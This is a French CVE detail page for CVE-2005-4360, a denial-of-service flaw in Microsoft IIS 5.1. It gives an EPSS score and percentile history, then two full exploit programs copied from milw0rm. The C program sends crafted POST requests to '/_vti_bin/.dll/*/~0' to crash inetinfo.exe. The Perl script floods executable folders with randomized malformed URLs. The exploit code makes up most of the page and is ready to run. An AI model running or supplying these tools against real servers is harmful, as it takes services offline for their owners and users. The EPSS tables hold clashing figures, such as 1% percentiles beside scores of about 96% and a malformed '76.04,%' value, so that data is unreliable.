CVE-2005-4360 : Détail

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Date	EPSS V0	EPSS V1	EPSS V2 (> 2022-02-04)	EPSS V3 (> 2025-03-07)	EPSS V4 (> 2025-03-17)
2022-02-06	–	–	58.55%	–	–
2023-03-12	–	–	–	96.9%	–
2023-03-26	–	–	–	96.82%	–
2023-05-14	–	–	–	96.77%	–
2023-07-02	–	–	–	96.58%	–
2023-08-27	–	–	–	96.76%	–
2023-11-12	–	–	–	96.71%	–
2024-04-14	–	–	–	96.82%	–
2024-06-02	–	–	–	96.82%	–
2024-12-08	–	–	–	95.39%	–
2024-12-22	–	–	–	90.81%	–
2025-01-19	–	–	–	90.81%	–
2025-03-18	–	–	–	–	80.41%
2025-03-30	–	–	–	–	76.04%
2025-03-30	–	–	–	–	76.04,%

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Date	Percentile
2022-02-06	99%
2023-03-12	99%
2023-03-26	99%
2023-05-14	99%
2023-07-02	99%
2023-08-27	1%
2023-11-12	1%
2024-04-14	1%
2024-06-02	1%
2024-12-08	99%
2024-12-22	99%
2025-01-19	99%
2025-03-18	99%
2025-03-30	99%
2025-03-30	99%

/***************************************************************** Microsoft IIS 5.1 Remote D.o.S Exploit by Kozan Application: Microsoft IIS (Internet Information Server) Vendor: Microsoft - http://www.microsoft.com/ Discovered by: Inge Henriksen Exploit Coded by: Kozan Credits to ATmaCA, Inge Henriksen Web: www.spyinstructors.com Mail: kozan@spyinstructors.com Vulnerable: Microsoft® Internet Information Server® V5.1 Not vulnerable: Microsoft® Internet Information Server® V5.0 Microsoft® Internet Information Server® V6.0 Only folders with Execute Permissions set to 'Scripts & Executables' are affected, such as the '_vti_bin' directory. inetinfo.exe will be crashed after exploitation finished successfuly. Usage: iis51dos.exe [Target Url or IP] *****************************************************************/ #include <winsock2.h> #include <stdio.h> #include <windows.h> #pragma comment(lib, "ws2_32.lib") char *HttpHeader(char *pszHost) { char szHeader[1000]; wsprintf( szHeader, "POST /_vti_bin/.dll/*/~0 HTTP/1.1\r\n" "Content-Type: application/x-www-form-urlencoded\r\n" "Host: %s\r\n" "Content-Length: 0\r\n\r\n" , pszHost ); return szHeader; } int main(int argc, char *argv[]) { fprintf(stdout, "\n\nMicrosoft IIS 5.1 Remote D.o.S Exploit by Kozan\n" "Bug Discovered by: Inge Henriksen\n" "Exploit Coded by: Kozan\n" "Credits to ATmaCA, Inge Henriksen\n" "www.spyinstructors.com - kozan@spyinstructors.com\n\n" ); if( argc != 2 ) { fprintf(stderr, "\n\nUsage:\t%s [WebSiteUrl]\n\n", argv[0]); return -1; } WSADATA wsaData; struct hostent *pTarget; struct sockaddr_in addr; SOCKET sock; char szHeader[1000], szWebUrl[1000]; lstrcpy(szWebUrl, argv[1]); lstrcpy(szHeader, HttpHeader(szWebUrl)); if( WSAStartup(0x0101,&wsaData) < 0 ) { fprintf(stderr, "Winsock error!\n"); return -1; } sock = socket(AF_INET,SOCK_STREAM,0); if( sock == -1 ) { fprintf(stderr, "Socket error!\n"); return -1; } if( (pTarget = gethostbyname(szWebUrl)) == NULL ) { fprintf(stderr, "Address resolve error!\n"); return -1; } memcpy(&addr.sin_addr.s_addr, pTarget->h_addr, pTarget->h_length); addr.sin_family = AF_INET; addr.sin_port = htons(80); memset(&(addr.sin_zero), '\0', 8); fprintf(stdout, "Please wait while connecting...\n"); if( connect( sock, (struct sockaddr*)&addr, sizeof(struct sockaddr) ) == -1 ) { fprintf(stderr, "Connection failed!\n"); closesocket(sock); return -1; } fprintf(stdout, "Connected.\n\n"); fprintf(stdout, "Please wait while sending DoS request headers...\n\n"); for( int i=0; i<4; i++ ) { fprintf(stdout, "Sending %d. request...\n", i+1); if( send(sock, szHeader, lstrlen(szHeader),0) == -1 ) { fprintf(stderr, "%d. DoS request header could not sent!\n", i+1); closesocket(sock); return -1; } fprintf(stdout, "%d. request sent.\n\n", i+1); } fprintf(stdout, "Operation completed...\n"); closesocket(sock); WSACleanup(); return 0; } // milw0rm.com [2005-12-19]

#!/usr/bin/perl # _really_ bored kokanin / IIS 5.1 dos thing, Inge says to use a browser at # http://ingehenriksen.blogspot.com/2005/12/microsoft-iis-remote-dos-dll-url.html # kokanin not like puny browser!!"#1 I hoped Inge was a leet haxx0r ch1ck, but it's # apparently a dude, bummer. According to Inge passing a kinda malformed url to # an executable dir a few times makes inetinfo.exe crap out. Yum, monday. This # script has insanely elite randomization of the url, it even amazes me. # Hello ilja, ptp people, others, see you at ccc and stuff. # sample executable dirs: /_vti_bin/ /_sharepoint/ /scripts/ /cgi-bin/ /msadc/ /iisadmpwd/ # sample malformed url: http://www.example.xom/_vti_bin/.dll/*\~0 # sample run: ./this-crap.pl <www.host.bla> </executable_folder/> <count> # count should be 4 according to inge, do more!!!!1one MILLIONS I SAY!!! use List::Util 'shuffle'; use IO::Socket::INET; $target = shift; $folder = shift; $amount = shift; # main iteration thingie for(1..$amount){ # construct an array of the reportedly bad characters for(1..31){ @badchars[$_] = chr($_); } # append the rest of them @badchars = (@badchars,"?","\"","*",":","<",">"); # shuffle the array so @shuffled[0] is random @shuffled = shuffle(@badchars); # this is the request $malformed = $folder . ".dll/" . @shuffled[0] . "/~" . int rand(9); # this is informative text print "[$_]\t greeting $target with: " . $malformed . "\n"; # create the socket $socket = new IO::Socket::INET( Proto => "tcp", PeerAddr => $target, PeerPort => "80", ); # error reporting die "unable to connect to $target ($!) - omgomgwtf itz dead w00t w00t \n" unless $socket; # the actual data transmission print $socket "GET " . $malformed . " HTTP/1.0\r\n" . "Host: $target\r\n" . "\r\n\r\n"; # all done close $socket; } # milw0rm.com [2005-12-19]